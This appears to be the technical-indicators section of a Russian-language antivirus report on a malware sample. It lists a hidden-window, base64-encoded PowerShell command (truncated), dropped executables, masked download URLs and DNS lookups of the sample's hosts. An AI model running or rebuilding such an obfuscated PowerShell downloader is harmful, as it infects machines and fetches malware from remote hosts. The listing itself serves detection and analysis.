Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABKAG8AbgBiAGUAaABvAG0AaQB3AHQAPQAnAFIAcABzAGoAZgB6AHoAYwBlAGUAJwA7ACQASgBxAGkAcQByAGQAeQB3AGUAcgBlAGoAdgAgAD0AIAAnADkAMwAzACcAOwAkAFYAcAByAHkAagBhAHUAdwBlAHoAdgBnAD0AJwBWAGUAegB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1532
- %TEMP%\1148182.cvr
- %HOMEPATH%\933.exe
- %HOMEPATH%\933.exe
- 'ii####nzania.com':80
- 'fd##.net':80
- 'ro##un.org':80
- http://ii####nzania.com/wp-admin/N8CWI/
- http://fd##.net/plugins/8xshhk/
- http://ro##un.org/error/7WJ1/
- DNS ASK ii####nzania.com
- DNS ASK fd##.net
- DNS ASK pm######el.newsoftdemo.info
- DNS ASK re###zaweb.site
- DNS ASK ro##un.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABKAG8AbgBiAGUAaABvAG0AaQB3AHQAPQAnAFIAcABzAGoAZgB6AHoAYwBlAGUAJwA7ACQASgBxAGkAcQByAGQAeQB3AGUAcgBlAGoAdgAgAD0AIAAnADkAMwAzACcAOwAkAFYAcAByAHkAagBhAHUAdwBlAHoAdgBnAD0AJwBWAGUAegB...' (со скрытым окном)